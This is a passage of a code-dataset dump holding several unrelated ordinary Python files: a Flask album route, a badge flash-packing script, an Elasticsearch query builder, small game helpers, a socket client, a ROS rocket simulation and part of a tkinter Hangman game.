Atualizando o nome do album\n mdb.albuns.update_one({'_id': ObjectId(resp['_id'])}, {'$set': {'album': resp['nome']}})\n return json.dumps({\n '_id': resp['_id'],\n 'sucesso': 'ALBUM ALTERADO COM SUCESSO'\n })\n elif request.method == 'DELETE': # Para exclusão do album\n resp = modelo.Utils.valida_dados(request)\n if 'erro' in resp.keys():\n return json.dumps(resp)\n # Veja o campo _id existe\n if not '_id' in resp.keys() or not resp['_id'] or len(resp['_id']) < 1:\n return json.dumps({'erro': 'FAVOR INFORMAR A QUAL ALBUM 
SE DESEJA ADICIONAR FOTOS'})\n # Veja se o album existe\n if mdb.albuns.find({'_id': ObjectId(resp['_id'])}).count() < 1:\n return json.dumps({'erro': 'ALBUM NÃO ENCONTRADO'})\n # Tudo certo, agora selecione o album e então passe sobre cada imagem e a exclua\n for alb in mdb.albuns.find({'_id': ObjectId(resp['_id'])}):\n for foto in alb['fotos']:\n # Vamos tentar excluir cada imagem\n for im in foto.keys():\n if im == '_id': continue\n try:\n caminho_completo = os.path.join(CAMINHO, foto[im])\n os.remove(caminho_completo)\n except OSError:\n pass\n # Agora remova o album todo\n mdb.albuns.delete_one({'_id': ObjectId(resp['_id'])})\n\n return json.dumps({'sucesso': 'ALBUM EXCLUIDO COM SUCESSO'})\n \n \n\n \n \n\n \n\n\n\n","sub_path":"flask/album.py","file_name":"album.py","file_ext":"py","file_size_in_byte":7788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"225628524","text":"#!/usr/bin/env python3\n\n#\n# Copyright 2019 Simon Marchi \n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n\n# Concatenate the files passed as arguments in a single file, and produce a\n# C 'table of contents'.\n\nimport argparse\nimport re\nimport os\n\n\ndef concat(out, files):\n \"\"\"Concaternate all files in out.\n\n Return a list where each element is a tuple:\n\n (filename, offset, size)\n \"\"\"\n file_list = []\n\n with open(out, 'wb') as o:\n for f in files:\n with open(f, 'rb') as i:\n # Seek to end\n i.seek(0, 2)\n size = i.tell()\n # Seek to beginning\n i.seek(0, 0)\n\n file_list.append((f, o.tell(), size))\n o.write(i.read())\n\n return file_list\n\n\ndef clean_filename(filename, keep_dir):\n \"\"\"Clean filenames for use in generated source code.\n\n Replace all non-alphanumeric characters by underscores. If keep_dir is\n False, remove the directory portion of the filename.\"\"\"\n\n if not keep_dir:\n filename = os.path.basename(filename)\n\n return re.sub('[^a-zA-Z0-9]', '_', filename)\n\n\ndef generate_h(h_file, metadata, flava):\n # Little exception for soldering...\n if flava == 'soldering':\n flava = 'ctf'\n\n with open(h_file, 'w') as h:\n h.write('/* This file is generated. 
*/\\n')\n h.write('\\n')\n h.write('#ifndef {}\\n'.format(clean_filename(h_file, True)))\n h.write('#define {}\\n'.format(clean_filename(h_file, True)))\n h.write('\\n')\n h.write('#ifndef NSEC_FLAVOR_{}\\n'.format(flava.upper()))\n h.write('#error \"Flavor mismatch: this external flash header is generated for {}\"\\n'.format(flava))\n h.write('#endif\\n')\n h.write('\\n')\n h.write('\\n')\n h.write('struct external_flash_data {\\n')\n h.write(' unsigned int offset, size;\\n')\n h.write('};\\n')\n h.write('\\n')\n for f in metadata:\n fname = clean_filename(f[0], False)\n offset = f[1]\n size = f[2]\n h.write('__attribute__((weak))\\n')\n h.write('const struct external_flash_data external_flash_{} = {{\\n'.format(fname))\n h.write(' .offset = {},\\n'.format(offset))\n h.write(' .size = {},\\n'.format(size))\n h.write('};\\n')\n h.write('\\n')\n\n h.write('#endif\\n')\n\n\ndef main():\n argparser = argparse.ArgumentParser()\n argparser.add_argument('output-base')\n argparser.add_argument('flavor', choices=['ctf', 'speaker', 'admin', 'conf', 'trainer', 'bar_beacon', 'soldering'])\n argparser.add_argument('input-files', nargs='*')\n\n args = vars(argparser.parse_args())\n\n flava = args['flavor']\n output_base = args['output-base']\n output_base += '_' + flava\n h_file = output_base + '.h'\n bin_file = output_base + '.flashbin'\n\n input_files = args['input-files']\n\n metadata = concat(bin_file, input_files)\n generate_h(h_file, metadata, flava)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"nrf52/utils/pack_flash.py","file_name":"pack_flash.py","file_ext":"py","file_size_in_byte":4072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"65737009","text":"try:\n import os\n import sys\n import json\n print(\"Import : {} OK \".format(__file__))\nexcept Exception as e:\n print(\"Some modules are missing {} \".format(e))\n\n\nclass ElasticSearchQuery(object):\n\n def __init__(self, size=10, BucketName=None, source=[], min_score=0.5):\n\n \"\"\"Constructor \"\"\"\n\n self.size = size\n self.BucketName = BucketName\n self.min_score = min_score\n self.source = source\n self.baseQuery = {\n \"_source\":source,\n \"size\":self.size,\n \"min_score\": self.min_score,\n \"query\": {\n \"bool\": {\n \"must\": [],\n \"filter\": [],\n \"should\": [],\n \"must_not\": []\n }\n }\n }\n self.GeoBaseQuery = {\n \"_source\":self.source,\n \"size\":self.size,\n \"query\": {\n \"bool\" : {\n \"must\":{ \"match_all\":{}},\n \"should\":[],\n \"filter\": {}\n }\n }\n }\n self.aggtem = []\n self.base_higghlight = {\n \"pre_tags\":[\n \"\"\n ],\n \"post_tags\":[\n \"\"\n ],\n \"tags_schema\":\"styled\",\n \"fields\":{\n\n }\n }\n\n def match(self,field=None, value=None, boost=None, operation='should',analyzer=None):\n\n _ = {\n \"match\": {\n field: {\n \"query\": value\n }\n }\n }\n if boost is None:\n self.baseQuery[\"query\"][\"bool\"][operation].append(_)\n\n if boost is not None:\n _[\"match\"][field][\"boost\"] = boost\n\n if analyzer is not None:\n _[\"match\"][field][\"analyzer\"] = analyzer\n\n self.baseQuery[\"query\"][\"bool\"][operation].append(_)\n\n return self.baseQuery\n\n def match_phrase(self, field=None, value=None, boost=None, operation='should',analyzer=None):\n _ = {\n \"match_phrase\": {\n field: {\n \"query\": value\n }\n }\n }\n\n if boost is None:\n self.baseQuery[\"query\"][\"bool\"][operation].append(_)\n\n if boost is not None:\n _[\"match_phrase\"][field][\"boost\"] = boost\n\n if analyzer is not None:\n 
_[\"match_phrase\"][field][\"analyzer\"] = analyzer\n\n self.baseQuery[\"query\"][\"bool\"][operation].append(_)\n\n return self.baseQuery\n\n def terms(self,field=None, value=None, boost=None, operation='should'):\n\n _ = {\"term\" :{\n field : value\n }\n }\n self.baseQuery[\"query\"][\"bool\"][operation].append(_)\n\n def add_aggreation(self, aggregate_name=None,\n field=None,\n type='terms',\n sort='desc',\n size = 10):\n\n _ = {\n aggregate_name:{\n type: {\n \"field\": field,\n \"order\" :\n {\"_count\" :\n sort\n },\n \"size\": size\n\n }\n }\n }\n self.aggtem.append(_)\n\n def complete_aggreation(self):\n _ = {\n \"aggs\":{\n\n }\n }\n for item in self.aggtem:\n for key,value in item.items():\n _[\"aggs\"][key] = value\n self.baseQuery[\"aggs\"] = _[\"aggs\"]\n return self.baseQuery\n\n def add_geoqueries(self, radius=None, lat=None, lon=None, field=None, operation='filter'):\n radius = str(radius) + \"mi\"\n _ = {\n \"geo_distance\" : {\n \"distance\": radius,\n field : {\n \"lat\": lat,\n \"lon\": lon\n }\n }}\n self.baseQuery[\"query\"][\"bool\"][operation].append(_)\n return self.baseQuery\n\n def wildcard(self,field=None, value=None, boost=None, operation=None):\n _ = {\n \"wildcard\":{\n field:{\n \"value\":value\n\n }\n }\n }\n if boost is None:\n self.baseQuery[\"query\"][\"bool\"][operation].append(_)\n return self.baseQuery\n else:\n _[\"wildcard\"][field][\"boost\"] = boost\n self.baseQuery[\"query\"][\"bool\"][operation].append(_)\n return self.baseQuery\n\n def exists(self,field=None, operation=\"must\"):\n\n _ = {\n \"exists\": {\n \"field\": field\n }\n }\n self.baseQuery[\"query\"][\"bool\"][operation].append(_)\n return self.baseQuery\n\n def query_string(self, default_field=None, query=None, operation=\"should\"):\n _ = {\n \"query_string\":{\n \"default_field\": default_field,\n \"query\":\"{}\".format(query)\n }\n }\n self.baseQuery[\"query\"][\"bool\"][operation].append(_)\n return self.baseQuery\n\n def add_geo_aggreation(self, field=None,lat=None, lon=None, aggregate_name='distance'):\n self.baseQuery.get(\"aggs\")[aggregate_name] = {\n \"geo_distance\" : {\n \"field\" : field,\n \"origin\" : \"{},{}\".format(lat, lon),\n \"unit\" : \"mi\",\n \"ranges\" : [\n { \"to\" : 0 },\n { \"from\" : 0, \"to\" : 25 },\n { \"from\" : 25, \"to\" : 50 },\n { \"from\" : 50, \"to\" : 75 },\n { \"from\" : 75, \"to\" : 100 },\n { \"from\" : 100 }\n ]\n }}\n return self.baseQuery\n\n def match_phrase_prefix(self, field=None, value=None, boost=None, operation='should',analyzer=None):\n _ = {\n \"match_phrase_prefix\": {\n field: {\n \"query\": value\n }\n }\n }\n\n if boost is not None:\n _[\"match_phrase_prefix\"][field][\"boost\"] = boost\n if analyzer is not None:\n _[\"match_phrase_prefix\"][field][\"analyzer\"] = analyzer\n self.baseQuery[\"query\"][\"bool\"][operation].append(_)\n return self.baseQuery\n\n def autocomplete_1(self, field=None,size=25, value=None, sort='des', operation='must'):\n query = self.match_phrase_prefix(field=field,value=value, operation=operation)\n query =self.add_aggreation(field=field, size=size, sort=sort,aggregate_name='auto_complete' )\n query = self.complete_aggreation()\n return query\n\n#\n# def main():\n# helper = ElasticSearchQuery(size=100, BucketName=\"MyBuckets\")\n#\n# # match phrase\n# query=helper.match_phrase(field=\"myfeild\", value=\"myvalue\", operation='must')\n#\n# # terms\n# query=helper.terms(field=\"myfeild\", value=\"myvalue\", operation='must')\n#\n# # Feild Exists\n# query = helper.exists(field='comp feild', 
operation=\"must\")\n#\n# #Match\n# query=helper.match(field=\"MMMMM\", value=\"myvalue\", operation='must')\n#\n# # Geo Queires\n# query = helper.add_geoqueries(radius=\"100\", lat=\"22\", lon=\"33\")\n#\n# # Aggreation\n# helper.add_aggreation(aggregate_name=\"FirstName\", field=\"field1\",type='terms',sort='desc', size=3)\n# helper.add_aggreation(aggregate_name=\"SecondName\", field=\"field2\",type='terms',sort='desc', size=3)\n# helper.add_aggreation(aggregate_name=\"ThirdName\", field=\"field3\",type='terms',sort='desc', size=3)\n# query = helper.complete_aggreation()\n# query = helper.query_string(default_field=\"DEFAULT\",query=\"X OR Y\",operation='must')\n#\n# query = helper.add_geo_aggreation(field=\"AAAA\", lat=\"22\", lon=\"43\",aggregate_name=\"my_distance\")\n#\n# print(json.dumps(query, indent=3))\n#\n#\n# def autocomplete():\n# helper = ElasticSearchQuery(size=0, BucketName=\"MyBuckets\")\n# query = helper.autocomplete_1(field=\"title\",value=\"n\", size=25,sort='desc')\n# print(json.dumps(query, indent=3))\n\n\n","sub_path":"backend/app/API/Compute/queryGenerator.py","file_name":"queryGenerator.py","file_ext":"py","file_size_in_byte":8009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"265749725","text":"import os\n\n\ndef choose_avatar():\n while True:\n try:\n character = int(input(\"1. ☆\\n2. ∆\\n3. ✧\\nChoose your character: \"))\n if character == 1:\n user = '☆'\n elif character == 2:\n user = '∆'\n elif character == 3:\n user = '✧'\n else:\n raise ValueError\n except ValueError:\n print(\"Choose a character using nubers 1-3: \")\n else:\n os.system('clear')\n return user\n\n\ndef choose_nickname():\n user_name = ''\n while True:\n try:\n user_name = input(\"Enter your nickname: \")\n if len(user_name) < 8 and len(user_name) > 0:\n os.system('clear')\n return user_name\n else:\n raise ValueError\n except ValueError:\n print(\"Your name is too long or too short\")\n","sub_path":"hero_creation.py","file_name":"hero_creation.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"540296849","text":"import socket\nimport sys\nimport time\n# Create a TCP/IP socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n# Connect the socket to the port where the server is listening\nserver_address = ('localhost', 10000)\n#server_address = ('103.53.231.126', 777)\nprint('connecting to {0} port {0}'.format(server_address))\nsock.connect(server_address)\nsock.sendall(\"webApp?connected\".encode())\nsock.recv(1024)\n\nisSendingRequest = False\n\ndef sendRequest(inputRequest):\n global isSendingRequest\n try:\n print(\"Request: \"+ inputRequest)\n nodesQuantity = 0\n if (len(inputRequest.split('?')) == 3):\n nodesQuantity = int(inputRequest.split('?',1)[0])\n inputRequest = inputRequest.split('?',1)[1]\n countWaiting = 1\n while(isSendingRequest):\n print(\"waiting......\")\n time.sleep(1) \n countWaiting += 1\n if (countWaiting > 5):\n isSendingRequest = False \n return\n isSendingRequest = True \n sock.sendall(inputRequest.encode())\n response = (sock.recv(1024)).decode()\n if (nodesQuantity != 0):\n if (response.split('|')[8] == '4'):\n for i in range(0, nodesQuantity - 1):\n response += '?' 
+ (sock.recv(1024)).decode()\n print(\"Server response: \" + response)\n isSendingRequest = False\n return response \n except:\n print('closing socket')\n sock.close()","sub_path":"socket_service/socket_client.py","file_name":"socket_client.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"334099385","text":"#!/usr/bin/env python\n#\n# Originally written for UNL CSCE 439/839 robotics class\n# by Carrick Detweiler\n#\n# HW2 \n\nimport roslib\nimport rospy\nfrom std_msgs.msg import Header\nfrom std_msgs.msg import Float64\nfrom random import gauss\n\nclass RocketShip(object):\n\n def updateRocket(self):\n # Increase acceleration control input, but only to a point\n if(self.control_accel.data < 1):\n self.control_accel.data += self.control_accel_delta\n\n # Update the true velocity based on controlled accel plus noise\n self.true_accel = self.control_accel.data + gauss(0,0.01)\n self.true_vel.data += self.true_accel*0.1 #10Hz rate\n # Update the true altitude\n self.true_altitude.data += self.true_vel.data*0.1\n\n # Now update the sensed accel, which will have more noise\n self.sensed_accel = self.true_accel + gauss(0,0.01)\n # Sensed velocity with more noise\n self.sensed_vel = self.true_vel.data + gauss(0,1)\n\n\n def __init__(self):\n rospy.init_node('rocketShip')\n\n # Create Publishers\n self.pub_true_altitude = rospy.Publisher('groundtruth/altitude', Float64, queue_size=1)\n self.pub_true_vel = rospy.Publisher('groundtruth/velocity', Float64, queue_size=1)\n self.pub_true_accel = rospy.Publisher('groundtruth/acceleration', Float64, queue_size=1)\n self.pub_sensed_accel = rospy.Publisher('sensors/acceleration', Float64, queue_size=1)\n self.pub_sensed_vel = rospy.Publisher('sensors/velocity', Float64, queue_size=1)\n self.pub_control_accel = rospy.Publisher('control/acceleration', Float64, queue_size=1)\n \n # Init variables\n self.true_altitude = Float64()\n self.true_vel = Float64()\n self.true_accel = Float64()\n self.sensed_accel = Float64()\n self.sensed_vel = Float64()\n self.control_accel = Float64()\n\n # Init values\n self.control_accel_delta = 0.005\n self.true_altitude.data = 0\n self.true_vel.data = 0\n self.control_accel.data = 0\n \n def flyMyRocket(self):\n while not rospy.is_shutdown():\n self.updateRocket()\n\n # Now publish everything\n self.pub_true_altitude.publish(self.true_altitude)\n self.pub_true_vel.publish(self.true_vel)\n self.pub_true_accel.publish(self.true_accel)\n self.pub_sensed_accel.publish(self.sensed_accel)\n self.pub_sensed_vel.publish(self.sensed_vel)\n self.pub_control_accel.publish(self.control_accel)\n\n rospy.sleep(0.1)\n\n\nif __name__ == '__main__':\n a = RocketShip()\n a.flyMyRocket()\n","sub_path":"ROS Workspaces/hw2stats/scripts/rocketShip.py","file_name":"rocketShip.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"650466758","text":"#!/usr/bin/env python3\nimport setup as st\nimport record as rc\n\nfrom time import strftime, sleep\nfrom tkinter import (Tk, Label, Button, Frame, StringVar, IntVar,\n DISABLED, NORMAL, SUNKEN, SOLID,\n RIGHT, LEFT, TOP, BOTTOM, BOTH, CENTER)\n\n\nclass Hangman:\n \"\"\"Hangman class,\n made in tkinter GUInterface\"\"\"\n def __init__(self, master=None):\n \"\"\"Constructor\"\"\"\n\n # Screens init\n self.master = master\n self.screen()\n self.build_frame()\n self.build_grid()\n\n # All displayed labels\n 
self.banner_text = StringVar()\n self.banner_text.set('')\n self.banner_text.trace('w', self.build_title_label)\n\n self.counter = StringVar()\n self.counter.trace('w', self.build_countdown)\n\n self.clock_text = StringVar()\n self.clock_text.set('Clock')\n self.clock_text.trace('w', self.build_clock_label)\n\n self.word_text = StringVar()\n self.word_text.set('Choose your category')\n self.word_text.trace('w', self.build_word_label)\n\n self.secret_word = StringVar()\n self.prompt = StringVar()\n self.prompt.set('random')\n\n self.timer_text = StringVar()\n self.timer_text.set(strftime(\"%H:%M\"))\n self.timer_text.trace('w', self.build_timer)\n\n self.time_left = IntVar()\n self.time_left.set(st.DEFAULT_GAP)\n self.time_left.trace('w', self.alert)\n\n self.score_text = IntVar()\n self.score_text.set('0\\n0')\n self.score_text.trace('w', self.build_score_label)\n\n # Predefined variables\n self.sorted = ''\n self.char = ''\n self.level_status = 1\n self.total = 0\n self.abc = []\n self.category = []\n self.level = []\n self.misses = []\n self.guesses = []\n self.s_w_list = []\n self.first_last = []\n self.a = {}\n self.running = False\n self.rem = self.master.winfo_screenwidth()\n self.w = self.master.winfo_screenwidth() / 5\n self.h = self.master.winfo_screenheight() * 2 / 7\n\n # Methods call in __init__()\n self.build_title_label()\n self.build_word_label()\n self.build_countdown()\n self.build_welcome_label()\n self.build_score_label()\n self.build_timer()\n self.build_clock_label()\n\n self.buttons()\n self.category_buttons()\n self.abc_buttons()\n\n # Update time\n self.update()\n\n def screen(self):\n \"\"\"Main window\n Minimal size 1024 / 600\n The window goes full screen if the width it's lower than 1440\"\"\"\n self.master.minsize(1024, 600)\n if self.master.winfo_screenwidth() <= 1440:\n # and self.master.winfo_screenheight() <= 720:\n self.master.overrideredirect(True)\n self.master.geometry('{0}x{1}+0+0'.format(\n self.master.winfo_screenwidth(),\n self.master.winfo_screenheight()))\n # elif 1024 < self.master.winfo_screenwidth() < 1920 \\\n # and 720 < self.master.winfo_screenheight() < 1080:\n # a = int(float(70) * float(self.master.winfo_screenwidth()) / 100)\n # b = int(float(70) * float(self.master.winfo_screenheight()) / 100)\n # self.master.overrideredirect(True)\n # self.master.geometry('{}x{}+{}+{}'.format(\n # a, b, (self.master.winfo_screenwidth() // 2 - a // 2),\n # (self.master.winfo_screenheight() // 2 - b // 2)))\n else:\n self.master.overrideredirect(True)\n x = int(float(65) * float(self.master.winfo_screenwidth()) / 100)\n y = int(float(75) * float(self.master.winfo_screenheight()) / 100)\n self.master.maxsize(x, y)\n self.master.geometry('{}x{}+{}+{}'.format(\n x, y, (self.master.winfo_screenwidth() // 2 - x // 2),\n (self.master.winfo_screenheight() // 2 - y // 2)))\n self.master.update_idletasks()\n\n def mini_screen(self):\n \"\"\"Secondary window for result information\"\"\"\n # noinspection PyAttributeOutsideInit\n self.master_2 = Tk()\n # noinspection PyAttributeOutsideInit\n frame = Frame(self.master_2, bg=st.color['fg'],\n highlightbackground=st.color['fg_enter'],\n highlightcolor=st.color['fg_enter'],\n highlightthickness=3)\n if self.rem < 1440:\n x, y = 400, 500\n else:\n x, y = 700, 700\n self.master_2.geometry(\n '{}x{}+{}+{}'.\n format(x, y,\n int(self.master.winfo_screenwidth() // 2 - x / 2),\n int(self.master.winfo_screenheight() // 2 - y / 2)\n ))\n self.master_2.overrideredirect(True)\n self.master_2.update_idletasks()\n 
frame.pack(fill=BOTH, expand=True)\n niv = None\n if self.level_status == 1:\n niv = st.L_EN[2]\n if self.level_status == 2:\n niv = st.L_EN[1]\n if self.level_status == 3:\n niv = st.L_EN[0]\n text = st.P_EN['won'].format(\n niv.capitalize(), self.secret_word.get(), self.total, ''\n )\n fg = 'green'\n bg = st.color['fg']\n if len(self.misses) == 7 or not self.time_left.get():\n text = st.P_EN['lose']\n fg = 'red'\n # noinspection PyAttributeOutsideInit\n label = Label(\n frame, text=text,\n bg=bg, fg=fg, justify=LEFT,\n font=st.font(self.rem, 5)\n )\n ok = Button(\n frame, bg=st.color['fg'],\n bd=0, fg=st.color['fg_enter'], font=st.font(self.rem, 3),\n text='Ok', command=lambda: self.master_2.destroy(),\n activeforeground='black', activebackground=st.color['fg'],\n width=2\n )\n label.pack(fill=BOTH, expand=True)\n ok.place(relx=0.5, rely=0.96, anchor='s')\n\n def score_screen(self):\n \"\"\"Score screen\"\"\"\n # noinspection PyAttributeOutsideInit\n self.master_3 = Tk()\n # noinspection PyAttributeOutsideInit\n self.frame = Frame(self.master_3, bg=st.color['fg'],\n highlightbackground=st.color['fg_enter'],\n highlightcolor=st.color['fg_enter'],\n highlightthickness=3)\n if self.rem < 1440:\n x, y = 450, 500\n else:\n x, y = 600, 700\n self.master_3.geometry(\n '{}x{}+{}+{}'.\n format(x, y,\n int(self.master.winfo_screenwidth() // 2 - x / 2),\n int(self.master.winfo_screenheight() // 2 - y / 2)))\n self.master_3.overrideredirect(True)\n self.master_3.update_idletasks()\n self.frame.pack(fill=BOTH, expand=True)\n text = 'Level \\t Points\\t\\tTime\\n' + 37 * '_' + '\\n'\n for item in rc.search():\n text += '{}\\t {} {}\\n'.format(\n item.level, item.points,\n item.timestamp.strftime(' %B %d, %Y %I:%M %p')\n )\n label = Label(\n self.frame, text=text,\n bg=st.color['bg'], fg=st.color['fg'], justify=LEFT,\n font=st.font(self.rem, 0)\n )\n ok = Button(\n self.frame, bg=st.color['bg'],\n bd=0, fg=st.color['fg_enter'], font=st.font(self.rem, 3),\n text='Ok', command=lambda: self.master_3.destroy(),\n activeforeground='black', activebackground=st.color['fg'],\n width=2\n )\n label.pack(fill=BOTH, expand=True)\n ok.place(relx=0.5, rely=0.96, anchor='s')\n\n def create_frame(self, frame, code):\n \"\"\"Creates frames for the main window\"\"\"\n wa, wb, ha, hb = None, None, None, None\n if code is 'm':\n wa, wb, ha, hb = 1, 1, 1, 1\n elif code is 'r2':\n wa, wb, ha, hb = 1, 1, 3, 5\n elif code in ['r0', 'r1', 'r3']:\n wa, wb, ha, hb = 1, 1, 1, 5\n return Frame(frame, bg=st.color['bg'],\n width=self.master.winfo_width()*wa//wb,\n height=self.master.winfo_height()*ha//hb\n )\n\n def create_button(self, frame, text):\n \"\"\"General buttons creator\"\"\"\n font = None\n command = self.set_command(text)\n state = None\n bg, fg, abg, afg, dfg = st.set_buttons_color(text)\n button = Button(\n frame, text=text.capitalize(), bg=bg, fg=fg, font=font, bd=0,\n command=command, justify='center', overrelief=SUNKEN,\n anchor=CENTER, state=state, disabledforeground=dfg,\n activeforeground=afg, activebackground=abg, image=None\n )\n return button\n\n def build_frame(self):\n \"\"\"All the frames for the main window\"\"\"\n # noinspection PyAttributeOutsideInit\n self.welcome = self.create_frame(self.master, 'm')\n self.welcome.config(highlightbackground=st.color['fg'],\n highlightcolor=st.color['fg'],\n highlightthickness=2)\n self.welcome.pack(fill=BOTH, expand=True)\n\n # noinspection PyAttributeOutsideInit\n self.mainframe = self.create_frame(self.master, 'm')\n 
self.mainframe.config(highlightbackground='black',\n highlightcolor='black',\n highlightthickness=2)\n self.mainframe.pack(fill=BOTH, expand=True)\n self.mainframe.pack_forget()\n # Row 0\n # noinspection PyAttributeOutsideInit\n self.row_0_grid = self.create_frame(self.mainframe, 'r0')\n self.row_0_grid.grid(row=0, column=0, sticky='news', pady=10)\n # Row 0 Column 1\n # noinspection PyAttributeOutsideInit\n self.row_0_column_1 = Frame(self.row_0_grid, bg=st.color['bg'])\n self.row_0_column_1.config(highlightbackground=st.color['fg'],\n highlightcolor=st.color['bg_start'],\n highlightthickness=2)\n self.row_0_column_1.grid(row=0, column=1, rowspan=2,\n sticky='news', pady=7)\n # Row 0 Column 2\n # noinspection PyAttributeOutsideInit\n self.row_0_column_2 = Frame(self.row_0_grid, bg=st.color['bg'])\n self.row_0_column_2.config(highlightbackground=st.color['fg'],\n highlightcolor=st.color['bg_start'],\n highlightthickness=2)\n self.row_0_column_2.grid(row=0, column=2, rowspan=2,\n sticky='news', padx=20, pady=6)\n # Row 0 Column 3\n # noinspection PyAttributeOutsideInit\n self.row_0_column_3 = Frame(self.row_0_grid, bg=st.color['bg'])\n self.row_0_column_3.grid(row=0, column=3, rowspan=2, columnspan=2,\n sticky='news', padx=3, pady=4)\n # Row 1\n # noinspection PyAttributeOutsideInit\n self.row_1_grid = self.create_frame(self.mainframe, 'r1')\n self.row_1_grid.grid(row=1, column=0, sticky='news', padx=13)\n # Row 2\n # noinspection PyAttributeOutsideInit\n self.row_2_grid = self.create_frame(self.mainframe, 'r2')\n self.row_2_grid.grid(row=2, column=0, sticky='news')\n # Row 3\n # noinspection PyAttributeOutsideInit\n self.row_3_grid = self.create_frame(self.mainframe, 'r3')\n self.row_3_grid.grid(row=3, column=0, sticky='news', padx=5, pady=5)\n\n def build_grid(self):\n \"\"\"Grid layout for all the frames\"\"\"\n u, u2 = None, None\n # Main Frame\n self.mainframe.columnconfigure(0, weight=1, uniform=u)\n for m in range(0, 4):\n self.mainframe.rowconfigure(m, weight=1, uniform=u2)\n # Row 0\n for y in range(15):\n self.row_0_grid.columnconfigure(y, weight=1, uniform=u)\n self.row_0_grid.rowconfigure(0, weight=1, uniform=u2)\n self.row_0_grid.rowconfigure(1, weight=1, uniform=u2)\n # Row 0 Column 1\n self.row_0_column_1.columnconfigure(0, weight=1, uniform=u)\n for c in range(6):\n self.row_0_column_1.rowconfigure(c, weight=1, uniform=u2)\n # Row 0 Column 2\n self.row_0_column_2.columnconfigure(0, weight=1, uniform=u)\n for c2 in range(3):\n self.row_0_column_2.rowconfigure(c2, weight=1, uniform=u2)\n # Row 0 Column 3\n self.row_0_column_3.columnconfigure(0, weight=1, uniform=u)\n for c3 in range(3):\n self.row_0_column_3.rowconfigure(c3, weight=1, uniform=u2)\n # Row 1\n for x in range(13):\n self.row_1_grid.columnconfigure(x, weight=1, uniform=u)\n self.row_1_grid.rowconfigure(0, weight=1, uniform=u2)\n self.row_1_grid.rowconfigure(1, weight=1, uniform=u2)\n # Row 2\n self.row_2_grid.columnconfigure(0, weight=1, uniform=u)\n self.row_2_grid.columnconfigure(1, weight=1, uniform=u)\n self.row_2_grid.rowconfigure(0, weight=1, uniform=u2)\n # Row 3\n for n in range(0, 4):\n self.row_3_grid.columnconfigure(n, weight=1, uniform=u)\n self.row_3_grid.rowconfigure(0, weight=1, uniform=u2)\n self.row_3_grid.rowconfigure(1, weight=1, uniform=u2)\n\n # noinspection PyUnusedLocal\n def build_score_label(self, *args):\n \"\"\"Word categories label\"\"\"\n bg, fg = st.set_buttons_color('points', 1)\n points = Label(\n self.row_0_column_1, text='Points:',\n bg=bg, fg=fg,\n font=st.font(self.rem, -4, 
style='normal'),\n bd=0,\n width=2\n )\n points.grid(row=0, column=0, sticky='news', padx=0, pady=0)\n b, f = st.set_buttons_color('score', 1)\n score = Label(\n self.row_0_column_1, textvariable=self.score_text,\n bg=b, fg=f,\n font=st.font(self.rem, 0),\n justify=CENTER,\n bd=0,\n width=2\n )\n score.grid(row=1, column=0, sticky='news', padx=0, pady=0)\n\n # noinspection PyUnusedLocal\n def build_welcome_label(self, *args):\n \"\"\"Word categories label\"\"\"\n bg, fg = st.set_buttons_color('title', 1)\n title = Label(\n self.welcome, text='Guess Letters',\n bg=bg, fg=fg,\n font=st.font(self.rem, 24),\n justify=CENTER\n )\n title.pack(side=TOP, padx=20, pady=50)\n\n # noinspection PyUnusedLocal\n def build_title_label(self, *args):\n \"\"\"Word categories label\"\"\"\n bg, fg = st.set_buttons_color('title', 1)\n title = Label(\n self.row_0_grid, text=self.banner_text.get(),\n bg=bg, fg=fg,\n font=st.font(self.rem, 10),\n width=6\n )\n title.grid(\n row=0, column=5, rowspan=2, columnspan=10,\n sticky='ew', padx=5, pady=2\n )\n\n # noinspection PyUnusedLocal\n def build_countdown(self, *args):\n \"\"\"Countdown label\"\"\"\n em = self.master.winfo_width() // 50\n # noinspection PyAttributeOutsideInit\n self.count = Label(\n self.row_2_grid, textvariable=self.counter,\n bg=st.color['bg'], fg=st.color['7'],\n font=('Times new Roman', int(4.5*em), 'bold'),\n )\n self.count.grid(\n row=0, column=0,\n sticky='nws', padx=2*em, pady=5\n )\n\n # noinspection PyUnusedLocal\n def build_clock_label(self, *args):\n \"\"\"Main clock label\"\"\"\n bg, fg = st.set_buttons_color('points', 1)\n # noinspection PyAttributeOutsideInit\n self.clock = Label(\n self.row_0_column_2, textvariable=self.clock_text,\n bg=bg, fg=fg,\n font=st.font(self.rem, 0),\n bd=0,\n width=2\n )\n self.clock.grid(row=0, column=0, sticky='news', padx=0, pady=0)\n\n # noinspection PyUnusedLocal\n def build_timer(self, *args):\n \"\"\"Timer label\"\"\"\n b, f = st.set_buttons_color('timer', 1)\n # noinspection PyAttributeOutsideInit\n 